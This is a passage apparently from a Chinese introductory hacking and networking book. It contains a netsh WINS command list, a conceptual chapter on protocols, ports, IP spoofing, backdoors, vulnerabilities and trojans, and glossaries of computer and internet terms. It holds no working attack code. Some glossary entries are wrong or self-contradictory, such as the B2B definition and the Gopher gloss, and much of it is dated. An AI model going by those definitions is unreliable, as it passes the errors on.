init replicate 用复制伙伴复制数据库。详细信息,请输入 init replicate /?
init restore 从文件还原数据库。详细信息,请输入 init restore /?
init scavenge 清除服务器的 WINS 数据库。详细信息,请输入 init scavenge /?
init search 搜索服务器的 WINS 数据库。详细信息,请输入 init search /?
reset statistics 重置服务器的统计信息。详细信息,请输入 reset statistics /?
set autopartnerconfig 设置服务器的自动复制伙伴配置信息。详细信息,请输入 set autopartnerconfig /?
set backuppath 设置服务器的备份参数。详细信息,请输入 set backuppath /?
set burstparam 设置服务器的突发处理参数。详细信息,请输入 set autopartnerconfig /?
set logparam 设置数据库和事件日志记录选项。详细信息,请输入 set logparam /?
set migrateflag 设置服务器的迁移标志。详细信息,请输入 set migrateflag /?
set namerecord 设置服务器的间隔和超时值。详细信息,请输入 set namerecord /?
set periodicdbchecking 设置服务器的定期数据库检查参数。详细信息,请输入 set periodicdbchecking /?
set pullpartnerconfig 设置指定的"拉"伙伴的配置参数。详细信息,请输入 set pullpartnerconfig /?
set pushpartnerconfig 设置指定的"推"伙伴的配置参数。详细信息,请输入 set pushpartnerconfig /?
set pullparam 设置服务器的默认"拉"参数。详细信息,请输入 set pullparam /?
set pushparam 设置服务器的默认"推"参数。详细信息,请输入 set pushparam /?
set replicateflag 设置服务器的复制标志。详细信息,请输入 set replicateflag /?
set startversion 设置数据库的开始版本 ID。详细信息,请输入 set startversion /?
show browser 显示所有活动域主浏览器的 [1Bh] 记录。详细信息,请输入 show browser /?
show database 显示指定服务器的数据库和记录。详细信息,请输入 show database /?
show info 显示配置信息。详细信息,请输入 show info /?
show name 显示服务器中特定记录的详细信息。详细信息,请输入 show name /?
show partner 显示服务器的"拉"或"推"(或"推拉")伙伴。详细信息,请输入 show partner /?
show partnerproperties 显示默认伙伴配置。详细信息,请输入 show partnerproperties /?
show pullpartnerconfig 显示"拉"伙伴的配置信息。详细信息,请输入 show pullpartnerconfig /?
show pushpartnerconfig 显示"推"伙伴的配置信息。详细信息,请输入 show pushpartnerconfig /?
show reccount 显示指定服务器所拥有的记录数量。详细信息,请输入 show reccount /?
show recbyversion 显示指定服务器所拥有的记录。详细信息,请输入 show recbyversion /?
show server 显示当前选定的服务器。详细信息,请输入 show server /?
show statistics 显示 WINS 服务器的统计信息。详细信息,请输入 show statistics /?
show version 显示 WINS 服务器的当前版本计数器值。详细信息,请输入 show version /?
show versionmap 显示所有者 ID 到"最大版本数"的映射。详细信息,请输入 show versionmap /?
Interface 命令
interface set/show interface 启用、禁用、连接、断开连接以及显示请求拨号接口的配置。
interface set/show credentials 在请求拨号接口上配置或显示用户名、密码和域名
第8章
一、协议:
网络是一个信息交换的场所,所有接入网络的计算机都可以通过彼此之间的物理连设备行信息交换,这种物理设备包括最常见的电缆、光缆、无线WAP和微波等,但是单纯拥有这些物理设备并不能实现信息的交换,这就好像人类的身体不能缺少大脑的支配一样,信息交换还要具备软件环境,这种“软件环境”是人类实现规定好的一些规则,被称作“协议”,有了协议,不同的电脑可以遵照相同的协议使用物理设备,并且不会造成相互之间的“不理解”。
这种协议很类似于“摩尔斯电码”,简单的一点一横,经过排列可以有万般变化,但是假如没有“对照表”,谁也无法理解一分杂乱无章的电码所表述的内容是什么。电脑也是一样,它们通过各种预先规定的协议完成不同的使命,例如RFC1459协议可以实现IRC服务器与客户端电脑的通信。因此无论是黑客还是网络管理员,都必须通过学习协议达到了解网络运作机理的目的。
每一个协议都是经过多年修改延续使用至今的,新产生的协议也大多是在基层协议基础上建立的,因而协议相对来说具有较高的安全机制,黑客很难发现协议中存在的安全问题直接入手进行网络攻击。但是对于某些新型协议,因为出现时间短、考虑欠周到,也可能会因安全问题而被黑客利用。
对于网络协议的讨论,更多人则认为:现今使用的基层协议在设计之初就存在安全隐患,因而无论网络进行什么样的改动,只要现今这种网络体系不进行根本变革,从根本上就无法杜绝网络黑客的出现。但是这种黑客机能已经超出了本书的范围,因而不在这里详细介绍。
二、服务器与客户端:
最简单的网络服务形式是:若干台电脑做为客户端,使用一台电脑当作服务器,每一个客户端都具有向服务器提出请求的能力,而后由服务器应答并完成请求的动作,最后服务器会将执行结果返回给客户端电脑。这样的协议很多。例如我们平时接触的电子邮件服务器、网站服务器、聊天室服务器等都属于这种类型。另外还有一种连接方式,它不需要服务器的支持,而是直接将两个客户端电脑进行连接,也就是说每一台电脑都既是服务器、又是客户端,它们之间具有相同的功能,对等的完成连接和信息交换工作。例如DCC传输协议即属于此种类型。
从此看出,客户端和服务器分别是各种协议中规定的请求申请电脑和应答电脑。作为一般的上网用户,都是操作着自己的电脑(客户端),别且向网络服务器发出常规请求完成诸如浏览网页、收发电子邮件等动作的,而对于黑客来说则是通过自己的电脑(客户端)对其他电脑(有可能是客户端,也有可能是服务器)进行攻击,以达到入侵、破坏、窃取信息的目的。
三、系统与系统环境:
电脑要运作必须安装操作系统,如今流行的操作系统主要由UNIX、Linux、Mac、BSD、Windows2000、Windows95/98/Me、Windows NT等,这些操作系统各自独立运行,它们有自己的文件管理、内存管理、进程管理等机制,在网络上,这些不同的操作系统既可以作为服务器、也可以作为客户端被使用者操作,它们之间通过“协议”来完成信息的交换工作。
不同的操作系统配合不同的应用程序就构成了系统环境,例如Linux系统配合Apache软件可以将电脑构设成一台网站服务器,其他使用客户端的电脑可以使用浏览器来获得网站服务器上供浏览者阅读的文本信息;再如Windows2000配合Ftpd软件可以将电脑构设成一台文件服务器,通过远程ftp登陆可以获得系统上的各种文件资源等。
四、IP地址和端口:
我们上网,可能会同时浏览网页、收发电子邮件、进行语音聊天……如此多的网络服务项目,都是通过不同的协议完成的,然而网络如此之大,我们的电脑怎么能够找到服务项目所需要的电脑?如何在一台电脑上同时完成如此多的工作的呢?这里就要介绍到IP地址了。每一台上网的电脑都具有独一无二的IP地址,这个地址类似于生活中人们的家庭地址,通过网络路由器等多种物理设备(无需初级学习者理解),网络可以完成从一个电脑到另一个电脑之间的信息交换工作,因为他们的IP地址不同,所以不会出现找不到目标的混乱局面。但是黑客可以通过特殊的方法伪造自己电脑的IP地址,这样当服务器接受到黑客电脑(伪IP地址)的请求后,服务器会将应答信息传送到伪IP地址上,从而造成网络的混乱。当然,黑客也可以根据IP地址轻易的找到任何上网者或服务器,进而对他们进行攻击(想想现实中的入室抢劫),因而如今我们会看到很多关于《如何隐藏自己IP地址》的文章。
接下来我解释一下上面提到的第二个问题:一台电脑上为什么能同时使用多种网络服务。这好像北京城有八个城门一样,不同的协议体现在不同的网络服务上,而不同的网络服务则会在客户端电脑上开辟不同的端口(城门)来完成它的信息传送工作。当然,如果一台网络服务器同时开放了多种网络服务,那么它也要开放多个不同的端口(城门)来接纳不同的客户端请求。
网络上经常听到的“后门”就是这个意思,黑客通过特殊机能在服务器上开辟了一个网络服务,这个服务可以用来专门完成黑客的目的,那么服务器上就会被打开一个新的端口来完成这种服务,因为这个端口是供黑客使用的,因而轻易不会被一般上网用户和网络管理员发现,即“隐藏的端口”,故“后门”。
每一台电脑都可以打开65535个端口,因而理论上我们可以开发出至少65535种不同的网络服务,然而实际上这个数字非常大,网络经常用到的服务协议不过几十个,例如浏览网页客户端和服务端都使用的是80号端口,进行IRC聊天则在服务端使用6667端口、客户端使用1026端口等。
五、漏洞:
漏洞就是程序中没有考虑到的情况,例如最简单的“弱口令”漏洞是指系统管理员忘记屏蔽某些网络应用程序中的账号;Perl程序漏洞则可能是由于程序员在设计程序的时候考虑情况不完善出现的“让程序执行起来不知所措”的代码段,“溢出”漏洞则属于当初设计系统或者程序的时候,没有预先保留出足够的资源,而在日后使用程序是造成的资源不足;特殊IP包炸弹实际上是程序在分析某些特殊数据的时候出现错误等……
总而言之,漏洞就是程序设计上的人为疏忽,这在任何程序中都无法绝对避免,黑客也正是利用种种漏洞对网络进行攻击的,本章开始的字眼儿“网络安全”实际就是“漏洞”的意思。黑客利用漏洞完成各种攻击是最终的结果,其实真正对黑客的定义就是“寻找漏洞的人”,他们并不是以网络攻击为乐趣,而是天天沉迷在阅读他人的程序并力图找到其中的漏洞。应该说,从某种程度上讲,黑客都是“好人”,他们为了追求完善、建立安全的互联网才投身此行的,只不过因为有的黑客或者干脆是伪黑客经常利用具有攻击性的漏洞,近些年人们才对黑客有了畏惧和敌视的心理。
六、加密与解密:
在“协议”的讲解中,我提到了“由于网络设计的基层存在问题……”,简单的说这一问题是允许所有上网者参与信息共享,因而对某些商业、个人隐私在网络上的传送,就会暴露在众目睽睽之下,我们的信用卡、个人电子邮件等都可以通过监听或者截获的方式被他人的到,如何才能让这些信息安全呢?读者也许想到了“二战中”的间谍战:参战国家在使用电报的时候,都对代码进行了加密处理,只有知道了“密码薄”的接收者,才可以进行译码工作。正是这种古老的加密方式,在现代化的网络上也依然存在它旺盛的生命力,通过加密处理的信息在网络上传送,无论谁拿到了这份文件,只要没有“密码薄”仍然是白费力气的。
网络上最长使用的是设置个人密码、使用DES加密锁,这两种加密方式分别可以完成用户登陆系统、网站、电子邮件信箱和保护信息包的工作,而黑客所要进行的工作,就是通过漏洞、暴力猜测、加密算法反向应用等方式获得加密档案的明文,有人把“魔高一尺、道高一仗”用在这里,的确是在恰当不过了!网络上的加密方法和需要验证密码的系统层出不穷,黑客也在寻找破解这些系统的种种办法。
可以说,“漏洞”和“解密”是两个完全不同的黑客领域,对于不同的学习者对他们的偏好,将会直接影响到今后将会成为的黑客类型,因而在二者之间的选择,应根据个人喜好进行,本书将会侧重学习“漏洞”方面的知识。
七、特洛伊木马:
特洛伊木马是一个程序,这个程序可以做程序设计者有意设计的未出现过的事情。但是对于特洛伊木马所做的操作,不论是否用户了解,都是不被赞同的。根据某些人的认识,病毒是特洛伊木马的一个特例,即:能够传播到其他的程序当中(也就是将这些程序也变成特洛伊木马)。根据另外的人的理解,不是有意造成任何损坏的病毒不是特洛伊木马。最终,不论如何定义,许多人仅仅用“特洛伊木马”来形容不能复制的带有恶意的程序,以便将特洛伊木马与病毒区分开
第9章
计算机英语名词解释
1、网络英语
Internet: 为International Net的简写,因特网,又称国际互联网。它最早产生于美国国防部的高级研究规划署,那是1969年的事了,最初的目的也只是远程计算机的数据共享,后来发展成将世界各地的计算机及计算机网络相互连接起来,形成了一个无边无际的超级大网。Internet的主要服务项目有:电子邮件(E-mail),远程登录(Telnet),查询服务(Finger),文件传输(FTP),文档服务器(Archive),新闻论坛(Usenet),电子公告牌(BBS),新闻群组(News Group),全球网(World Wide Web,缩写为WWW,又称万维网)等。
BBS:Bulletin Board System,公告牌系统或电子公告板,又称Public Access Message System,公共访问信息系统。它是普通公告的电子版本,用户可以通过公告牌发布消息,任何用户都可以读取公告牌上的消息,也可以给某一特定的人或一组用户发送信息。公告牌系统被广泛地用于传播信息,咨询一个电子公告牌往往比使用交互信箱或公共邮政系统发送公告更加快捷、有效。
WWW: World Wide Web的缩写,全球网,又称万维网。它是一个基于超文本方式的信息检索工具,提供一种友好的信息查询接口,是目前最受欢迎同时也是最先进的Internet检索工具之一。
Remote Login: 远程登录(注册),它是在网络环境下实现资源共享的一种重要手段,采用这种方式,用户可连接到世界任何一台Internet主机。
HTTP: Hyper Text Transmission Protocol,超文本传输协议。
IP:IP国际互联网协议,即网际协议。
FTP:是 Transfer Protocol的缩写,即文件传输协议,用于在Internet上传输文件。FTP的任务是从一台计算机将文件传送到另一台计算机。人们通过FTP可以获得很多免费的实用软件。
Gopher: 读音/′guf/,英文意为“地鼠”;(美国南部穴居的)可食用的龟”。它是Internet中基于菜单驱动的信息查询软件,可将用户的请求自动转换成FTP(文件传输协议)或Telnet(用于远程终端连接的标准IP协议)命令,在菜单的引导下,用户可对Internet上远程信息系统进行访问。
Archive: 读音/′a:kaiv/,“档案;档案馆”之意。Internet中的文档服务器,可定期自动地访问众多的Internet FTP服务器,将这些服务器上的文件索引成一个可以检索的数据库。
WAIS:是Wide Area Information Service的简写,广域信息服务器。它使得Internet上巨大的数据资源变得易于检索,并且可以获得远程数据库的信息。
Luisitserv: 这是Internet上流行的用户之间交流信息的方式。
IRC:Internet Relay Chat,互联网接力聊天。这是一种多用户聊天设施,允许多个用户通过文字实时地与其它人聊天。
Hypertext: 超文本。本来用做表示所有超链接,也表示包含“链接”的文本。这是一种非线性的信息组织方法,文字、图形和其它数据做为单个元素都能够指向(链接)其它元素。
Hyperlink: 超链接。一种与其它文件的“链接”,文件中图片、按钮、“热词”或短语都可以做为超链接,当用户选择超链接之后,所连接的信息就会显示出来。
HTML: Hyper Text Markup Language,超文本标示语言。它是由欧洲粒子实验室一名想象力丰富的研究员Tim Bemers Lee发明的,是“WWW(全球网)世界”的通用语言。“WWW世界”的诸服务器与客户浏览器间,通过它互相沟通;信息资源也是由它描述而“表现”的,HTML可以 描述主页(Home Page)和静态的文本。全世界有几千万人在使用HTML语言,可以毫不夸张地说,没有HTML就没有“WWW世界”。
Hypermedia: 超媒体。一种以计算机为基础的利用文字、图形、动画、声音和视频传送和显示信息的方法。这些文字等超媒体的组成元素既可以与其它文件连接,又可以做为单个对象处理。
Navigator: 是美国网景(Netscape)公司出品的Internet浏览器软件之一。Navigator的英文意思是“航海者、海上探险者”,寓意人们可以使用该软件在Internet网络的海洋中航行、探险。Navigator不仅可以浏览万维网(WWW),还具有电子邮件(E-mail)、文件传输(FTP)、远程登录(Telnet)及新闻组(News Group)、信息浏览(Gopher)等多种功能。
IE:Internet Explorer,Explorer意为“探险者”。
2、著名的计算机语言
VF:也写作VFP,Visual FoxPro的缩写,Visual在英语中意为“可视的”,Fox意为“狐狸”,原指美国狐狸数据库软件公司,该公司已被微软公司收购。Pro为Progress的略写,意为“更进一层”。Visual FoxPro是由Microsoft在FoxPro的基础上推出的功能强大、可视化、面向对象的数据库编程语言,同时它也是一种强大的数据库管理系统。
VC:Visual C++,微软公司高级可视化计算机程序开发语言。C语言被人们称为近十年来对计算机程序设计最大的贡献之一。它有高级语言简单易用的特性,又可以完成汇编语言才能做的许多工作。因此,C语言特别适合用来编写各种复杂软件。如果说BASIC语言是初学者和业余爱好者的编程语言的话,那么C语言就是专业人员的编程语言了。
VB:Visual Basic的缩写,微软公司高级可视化计算机程序开发语言。BASIC是Beginner’s All-purpose Sybolic Instruction Code(初学者通用符号指令代码)的缩写,从BASIC开始相继推出了Quick BASIC、Ture BASIC等,目前最新的是Microsoft公司推出的Visual Basic。这是一种功能极强的面向对象的可视化程序设计语言。
Delphi:读音/′delfai/,特尔斐,古希腊城市名,被古希腊人当成世界的中心,因有阿波罗神殿而出名。在电脑英语中指美国宝兰(Borland)公司的一种可视化、面向对象、事件驱动的电脑编程语言。
Java:读音/′da:v/,《新英汉字典》译注为“爪哇岛(属印度尼西亚)、爪哇咖啡”。电脑英语指由美国太阳(Sun)公司推出的新型面向对象程序设计语言。Java集面向对象、平台无关性、稳固性、安全性、多线程等诸多特性于一体,增加了异常处理、网络编程等方面的功能,特别适合于Internet应用的开发,是实现“一个世界,一个网络”构想的关键。用Java编写的各类软件能真正做到“Write Once,Run anywhere(一次写成,到处运行)”,也就是说,相同的软件可在不同计算机上运行,无论是PC机、苹果机、UNIX计算机、还是顶置盒、PDA(个人数据助理)乃至智能元器件无一例外。
SQL:Structure Query Language,结构化查询语言。SQL是关系数据库管理系统中的一种简明扼要、面向集合的语言,它对一个或多个数据表进行查询,产生一个结果数据表。
3、常见的重要电脑英语及其缩写
PC:Personal Computer,个人计算机、个人电脑,又称微型计算机或微机。
NC: Network Computer,网络计算机。
MPC: Multimedia Personal Computer,多媒体个人电脑。
MMX: 是MultiMedia eXtensions(多媒体扩展)的缩写,是第六代CPU芯片的重要特点。MMX技术是在CPU中加入了特地为视频信号(Video Signal),音频信号(Audio Signal)以及图像处理(Graphical Manipulation)而设计的57条指令,因此,MMX CPU极大地提高了电脑的多媒体(如立体声、视频、三维动画等)处理功能。
Intel Pentium 166MHz MMXTM: Intel Pentium是英特尔(Intel)公司生产的“奔腾”CPU。意为“Registered”(注册商标)。166MHz指CPU时钟频率,MHz即Mega Hertz的缩写。MMXTM中的TM是“Trade Mark”的简写,意为“注册商标”。
OOP: Object Oriented Programming,面向对象的程序设计。所谓“对象”就是一个或一组数据以及处理这些数据的方法和过程的集合。面向对象的程序设计完全不同于传统的面向过程程序设计,它大大地降低了软件开发的难度,使编程就像搭积木一样简单,是当今电脑编程的一股势不可挡的潮流。
28VGA: 28是指彩色显示器上的黄光网点间距(点距),点距越小的显示器,图像就越细腻、越好,这是因为彩色屏幕上的每个像点都是由一组红、绿、蓝光汇聚而成的,由于在技术上三束光还不能100%地汇聚在一点上,因此会产生一种黄光网点的间隔,这种间隔越小,屏幕上显示的图像越清晰。VGA是Video Graphics Array(视频图形阵列)的缩写。
FAT:Allocation Table,文件分配表,它的作用是记录硬盘中有关文件如何被分散存储在不同扇区的信息。
EPA:Environmental Protection Agency的简称,美国环境保护署。EPA于1992年宣布了“能源之星”(Energy Star)计划,并得到了国际社会的积极响应。只要启动电脑,过不了几秒钟就能见到屏幕上出现“能源之星”的标志。能源之星的目标是当电脑系统的各个部件不活动时自动进入低功耗状态,当部件的能动性恢复(即当键盘、鼠标等被使用)时,电脑系统自动回到完全清醒的状态。对于符合能源之星规范的产品,EPA将发给能源之星标志“EPA POLLUTION PREVENTER”,意为“美国环境保护署认可的防污染的节能产品”。
IC卡:Intelligent Card,智能卡。
ATX:一种新的电脑机箱、主板、电源的结构规范。
IDE:集成电路设备或智能磁盘设备。
DLL:Dynamic Link Library,动态链接库。
KB:Kilo Byte,KB表示千字节。K=Kilo,构词成分,表示“千;千米;公斤;公里”。B=Byte,意为“字节”,是电脑中最小存贮单位(一个字节可以存贮一个英文字母,每两个字节可以存放一个汉字)。
MB:Mega Byte,MB表示兆字节。M=Mega,构词成分,表示“兆;百万”。
GB:Giga Byte,GB表示千兆字节。G=Giga,构词成分,表示千兆;十亿”。
CAI:Computer-Asisted Instruction或Computer-Aided Instruction,计算机辅助教学。它将是二十一世纪最重要、最受欢迎的教学手段。
CAD:Computer-Aided Design,计算机辅助设计。
ISO:International Standard Organization,国际标准化组织。ISO于1987年推出有关质量管理和质量保证的ISO 9000系列国际标准,于1994年又发布了经过修订的标准。其中,构成ISO 9000系列标准的主要标准分别是:1.ISO 9000-1:1994《质量管理和质量保证标准—第一部分:选择和使用指南》。2.ISO 9001:1994《质量体系—设计、开发、生产、安装和服务的质量保证模式》。3.ISO 9002:1994《质量体系—最终检验和试验的质量保证模式》。
3DS或3D Studio: Three Dimension Studio,三维摄影室。是美国Autodesk公司推出的一套多功能三维动画软件,集实体造型、静态着色和动画创作于一体,极大地普及了三维造型技术。它能够与AutoCAD进行图形信息交换,利用扫描仪输入图形,通过VGA与电视转换接口将动画输出至电视或录像带。
VR:Virtual Reality,虚拟现实,又称投入3D,由空军模拟飞行装置演变而来,基本上是利用左、右视觉空间交替变换显示图像的原理产生立体效果,实际上已超出图像处理的范畴,是综合光、声、图像的计算机生成环境,人们能够像在实际生活中那样对虚拟环境中的对象进行交互式操作,虚拟现实应用前景极为广阔。
OCR:Optical Character Recognition(光学字符识别)的缩写,是指将文字材料通过扫描仪输入作为计算机图像文件,通过软件识别为中文或英文内码,然后进行文字处理。由于手写体的随意性太大,目前OCR主要限于印刷文字的识别。目前代表中文OCR识别准确率最高水平的是清华文通公司出品的TH-OCR NT for Windows。
SCSI:Small Computer System Interface,小型计算机系统接口,它是为解决众多的外部设备与计算机之间的连接问题而出现的。
OEM:Original Equipment Manufacturer,原始设备制造商。
Microsoft OEM: 微软OEM产品。它是指预安装在微机上的软件操作系统,包括Windows98、Windows NT、WorkStation、Windows3.X、MS-DOS。
MIS:Management Information System,管理信息系统。它广泛地应用于各行各业,国内最有名的管理信息系统有“王特MIS”、“雅奇MIS”、“Quick MIS”。
PNP:Plug and Play,即插即用,它是Window98的一个重要技术特性。所谓即插即用是指将符合PNP标准的PC插卡等外围设备安装到电脑时,操作系统自动设定系统结构的技术。这就是说,当用户安装新的硬件时,不必再设置任何跳线器开关,也不必用软件配置中断请求(IRQ)、内存地址或直接存储器存取(DMA)通道,Windows98会向应用程序通知硬件设备的新变化,并会自动协调IRQ、内存地址和DMA通道之间的冲突。
OLE:Object Linking and Embedding,对象连接与嵌入,简称OLE技术。OLE不仅是桌面应用程序集成,而且还定义和实现了一种允许应用程序作为软件“对象”(数据集合和操作数据的函数)彼此进行“连接”的机制,这种连接机制和协议称为部件对象模型(Component Object Model),简称COM。OLE可以用来创建复合文档,复合文档包含了创建于不同源应用程序,有着不同类型的数据,因此它可以把文字、声音、图像、表格等组合在一起。
MIDI:Musical Instrument Digital Interface,乐器数字接口。它是多媒体的基本术语之一,MIDI文件是用电子乐器如:电子琴、吉它、萨克斯等演奏并录制下来的,它能在大多数的多媒体计算机声音卡上播放,即使不去创建自己的MIDI文件,也可以使用现有的MIDI文件,作为多媒体演示的背景音乐。MIDI文件储存的只是对声音的描述,依靠声音卡的合成器(FM或者波形表)来产生人们想听的真实声音。
MPEG:是Motion Picture Experts Group的缩写,意即“运动图像专家组”,它是多媒体计算机中的一种活动图像及其伴音的压缩编码标准,即人们通常所说的MPEG标准。它包括三部分:MPEG音频、MPEG视频、和MPEG系统。
第10章
名词解释
◎ 网络快车ADSL
ADSL(Asymetric Digital Subscriber Loop)技术即非对称数字用户环路技术,就是利用现有的一对电话铜线,为用户提供上、下行非对称的传输速率(带宽),上行(从用户到网络)为低速的传输,可达640Kbps;下行(从网络到用户)为高速传输,可达7Mbps。它最初主要是针对视频点播业务开发的,随着技术的发展,逐步成为了一种较方便的宽带接入技术,为电信部门所重视。
这种宽带接入技术具有以下特点:
1.可直接利用现有用户电话线,无须另铺电缆,节省投资;
2.渗入能力强,接入快,适合于集中与分散的用户;
3.能为用户提供上、下行不对称的传输带宽;
4.采用点一点的拓扑结构,用户可独享高带宽;
5.可广泛用于视频业务及高速INTERNET等数据的接入。
目前,由于普通的INTERNET用户接入网络的方式采用拨号MODEM的方式,因此,INTERNET用户的剧增可能会造成网络的拥塞(国外已经出现了这种情况),而使用ADSL可以加以避免。
◎ ASP
ASP 全称为 Active Server Pages(动态服务器主页),它一种应用程序环境,可以利用 VBscript 或 Java Script 语言来设计,主要用于网络数据库的查询与管理。其工作原理是当浏览者发出浏览请求的时候,服务器会自动将 ASP 的程序码,解释为标准 HTML 格式的网页内容,再送到浏览者浏览器上显示出来。我们也可以将 ASP 理解为一种特殊的 CGI。
◎ 安全认证(CA)
在网上交易中,客户、商家、银行不可能直接见面。为了确认交易各方的身份以及保证交易的不可否认,需要有一份数字证书来进行验证,这就是电子安全证书。电子安全证书由认证中心来发放。
安全证书是保证个人身份或Web站点安全的声明。安全证书是对个人身份的一种保证。可以指定自己的信息,如用户名和密码。在用户通过Internet向那些需要证书以证明自己身份的Web站点发送个人信息时使用这些信息。“Web安全证书”表明特定的Web站点是否安全和真实。这可以确保其他任何Web站点都无法冒充源安全站点的身份。
◎ B2B
电子商务按交易对象分类中的一种,即表示商业机构对消费者的电子商务。这种形式的电子商务是在企业与企业之间进行的。一般以信息发布与撮合为主,主要是建立商家之间的桥梁。著名的阿里巴巴(www.Alibaba.com)就是属于这种站点。例如:某商店利用计算机网络想某电器工厂订购电风扇,并且通过网络进行签定协议、付款商务活动。这就是简单的B2B电子商务形式。是企业在激烈的市场竞争面前,改善自我竞争条件的主要方法。
◎ B2C
电子商务按交易对象分类中的一种,即表示商业机构对消费者的电子商务。这种形式的电子商务一般以网络零售业为主,主要借助于Internet开展在线销售活动。例如经营各种书籍、鲜花、计算机、通信用品等商品。著名的亚马逊(www.amazon.com)和国内著名的一号网(www.1hao.com)就是属于这种站点。
◎ BBS
BBS即电子公告牌。是互联网上早期比较流行的一种信息交换方式。用户一般在登记以后就可以发布信息,也可以在在上面查询自己比较感兴趣的信息。BBS一般分为Unix的字符方式和WWW图形方式。大多数的BBS是采用Unix字符方式的。登录到这种BBS系统一般使用远程登录方式(即使用Telnet来连接BBS系统的主机)。国内著名的BBS系统如:“蓝天BBS”(bbs.gznet.com)。
◎ 版主
版主指网站的主页或网站中某个栏目的维护者,有时候被戏称为“斑竹”。通常版主主要负责相关主页的维护。包括信息的更新管理、回答访问者的问题等等。
◎ CNNIC
CNNIC即中国互联网络信息中心。是成立于1997年6月3日的非盈利管理与服务机构,行使国家互联网络信息中心的职责。中国科学院计算机网络信息中心承担CNNIC的运行和管理工作,CNNIC在业务上接受信息产业部领导,在行政上接受中国科学院领导。CNNIC工作委员会,对CNNIC的建设、运行和管理进行监督评定。
CNNIC的主要任务有:注册服务、目录数据库服务、信息服务、网站访客流量认证、认证培训等。
此外,CNNIC还承担与Internet有关的国家科研项目以及向社会提供Internet技术咨询和服务工作。CNNIC作为国家级的互联网络信息中心,代表我国各互联网络单位与国际互联网络信息中心(InterNIC)、亚太互联网络信息中心(APNIC),及其它的互联网络信息中心进行业务联系。
◎ CEO
CEO是Chief Executive Officer的缩写,现代公司管理制度中的首席执行官。
◎ CIO
CIO 是 Chief Information Officer 的缩写,现代公司管理制度中首席信息总监。
◎ CTO
CTO是Chief Technology Officer的缩写,现代公司管理制度中的首席技术总监。
◎ COO
COO 是 Chief Operation Officer的缩写,现代公司管理制度中的首席营运总监。
◎ CFO
CFO是Chief Financial Officer的缩写,现代公司管理制度中的首席财政总监。
◎ CGO
CGO是Chief Government Officer的缩写,现代公司管理制度中的首席沟通总监。
◎ 插件
插件,即英文的Plug-in,是一种程序。浏览器一般能够直接调用插件程序。插件安装后就成为浏览器的一部分,可以处理特定的文件。插件的使用,增强了浏览器处理不同Web文件的能力。
◎ DDN
DDN(Digital Data Network)也称数字数据网。DDN是骨干数据网最早的形式之一,它是一种纯物理层、半永久性的网络,也就是说它只负责把数据从A点传送到B点,而不管数据被封装成何种形式。
DDN的特点是传输速率高、有保障、时延较小。用户的接入方式一般是专线,进网速率为N*64k,最高达2M,用户可自由选择DDN的业务有:
1、提供"点到多点"的电路连接,适合于用户广播发送各种新闻、天气、证券等信息,也适用于集中监控、信用卡验证、销售终端(POS)验证、预订系统等业务;
2、提供"多点到多点"的电路连接,适合于用户的网络互连;
3、在一条专线上给用户同时提供语音和传真业务,能进行标准的语音压缩功能。
◎ 电子商务
电子商务(EC,也就是E-Commerce的缩写),关于电子商务的定义世人众说纷纭,从不同的角度出发有不同的定义。可以理解为以Internet为依托,借助一定的信用支付手段,在网络上进行产品的购销、费用支付及其他商务活动等。按交易对象不同进行分类,可以分为:BtoB(常简称为B2B,商业机构对商业机构的电子商务)、BtoC(常简称为B2C,商业机构对消费者的电子商务)、CtoC(常简称为C2C,即消费者对消费者的电子商务)、CtoB(常简称为C2B,即消费者对商家的电子商务)等。国内著名电子商务站点如:www.Alibaba.com、www.8848.net、www.1hao.com等。
◎ E-mail
E-mail即电子邮件。戏称“伊妹儿”。互联网上的一种信息传递方式。顾名思义,就象生活中的邮局传递方式一样,发送邮件要填写地址,这里也一样要有E-mail地址,形式大都为:yourname@xxx.xxx,例如:yourname@yahoo.com。(其中“@”表示“在”的意思,读“at”,可理解为Internet上的某台邮件服务器上的一个用户地址)。你可以将自己的文本信息甚至图象、声音信息通过邮件软件发送出去,将你的信件直接发送给你想发送的人。
E-mail作为Internet的重要资源,和传统的信件相比有许多无可比拟的优越性:
1、 广阔的发送范围;
2、 瞬间的发送和接收速度;
3、 低廉的经济费用等。
随着Internet的发展,国内目前已经有大量的免费E-mail服务提供商,如www.163.net等。
◎ FTP
FTP是File Transfer Protocol的缩写。即文本传输协议。是Internet上使用非常广泛的一种通讯协议。他是有支持Internet文件传输的各种规则所组成的集合。这些规则使Internet用户可以把文件从一个主机传送到另一个主机上。FTP通常也表示用户执行这个协议所使用的应用程序,如:CutFTP等。用户使用的方法很简单,启动FTP软件先与远程主机建立连接,然后想远程发出指令即可。
◎ FAQ
FAQ是Frequently Asked Questions 的缩写。表示经常被问到的问题及其解答。在互联网上发布FAQ是使新用户不再提出相同的问题。
◎ 防火墙
防火墙(Firewall)就好象是内部网络与外部网络连接的安全桥梁。通过防火墙可以拦截并过滤信息,只让符合安全标准的信息通过。这样可以最大限度地隔离互联网上的破坏者和阻止黑客的入侵。
◎ 公司主页
在茫茫网海里,公司可以建立一个随时可供用户访问浏览的页面。这个页面就叫做主页(Homepage)。可以将公司产品信息或其他信息以文字、图形、图象、动画、声音和视频等形式展现在主页上。用户通过主页可以访问包含更多信息的其他页(Pages)。主页通常是用户使用Web浏览器程序访问Internet上任何Web主机所看到的第一个页面。在很多场合中,Homepage与Pages并不区分,或者都称为Homepages,或称为Pages。著名公司主页地址如:www.microsoft.com、www.ibm.com等。
◎ 个人主页
象公司一样,个人也可以建立一个随时可供用户访问浏览的页面。这个页面就叫做主页(Homepage)。个人可以将自己的爱好、特长等通过文字、图形、图象、动画、声音和视频等富于个性化的形式展现在自己的主页上,随时供网友访问浏览。以达到与网友交流、展现自我的效果。用户通过主页可以访问包含更多信息的其他页(Pages)。主页通常是用户使用Web浏览器程序访问Internet上任何Web主机所看到的第一个页面。在很多场合中,Homepage与Pages并不区分,或者都称为Homepages,或称为Pages。目前个人主页空间提供商多数以免费的形式提供,如:Supercool.163.net。著名的个人主页如:carboy.163.net。
◎ HTTP
HTTP(Hypertext Transfer Protocol),即超文本传输协议。是WWW浏览器和WWW服务器之间的应用层通讯协议。HTTP协议是基于TCP/IP之上的协议,它不仅保证正确传输超文本文档,还确定传输文档中的哪一部分,以及哪一部分内容首先显示(如文本先与图形)等等。
◎ 黑客
黑客是英文Hacker的音译。也称“骇客”。原意指热衷于深入了解计算机系统或网络内部工作原理的那些程序人员。后来被用于指那些利用其掌握的网络技术在网上进行破坏或制造恶作剧的人。
◎ Internet
